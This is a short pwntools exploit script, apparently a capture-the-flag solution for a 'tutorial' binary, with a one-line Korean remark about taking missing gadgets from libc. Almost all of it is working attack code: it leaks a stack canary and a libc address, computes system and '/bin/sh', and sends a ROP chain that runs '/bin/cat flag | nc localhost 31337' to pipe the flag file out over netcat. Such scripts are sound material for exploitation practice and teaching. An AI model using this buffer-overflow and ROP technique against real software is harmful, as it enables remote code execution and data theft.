: ) 바이너리안에 없는 가젯은 libc에서 찾장
from pwn import *
s = remote("localhost",1233)
libc = ELF("./libc")
elf = ELF("./tutorial")
def manual():
s.recvuntil(">")
s.sendline("1")
def practice(content):
s.recvuntil(">")
s.sendline("2")
s.recvuntil("Time to test your exploit...")
s.sendline(content)
def quit():
s.recvuntil(">")
s.sendline("3")
practice("A"*311)
s.recvuntil(">")
print s.recv(312)
canary = u64(s.recv(8))
print "canary : " + hex(canary)
manual()
s.recvuntil("Reference:")
puts_libc = int(s.recv(14),16) + 1280
print "puts_libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
one_shot = libc_base + 0xf02a4
bin_sh = libc_base + next(libc.search("/bin/sh\0"))
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "one_shot : " + hex(one_shot)
print "bin_sh : " + hex(bin_sh)
pop_rdi = 0x004012e3
pop_rbp = 0x00400cd5
pop_rsi_r15 = 0x004012e1
pop_rdx = libc_base + 0x00001b92
cmd = "/bin/cat flag | nc localhost 31337"
pay = "A"*312
pay += p64(canary)
pay += "B"*8
pay += p64(pop_rdi)
pay += p64(4)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(system)
practice(pay)
s.send(cmd)
s.interactive()
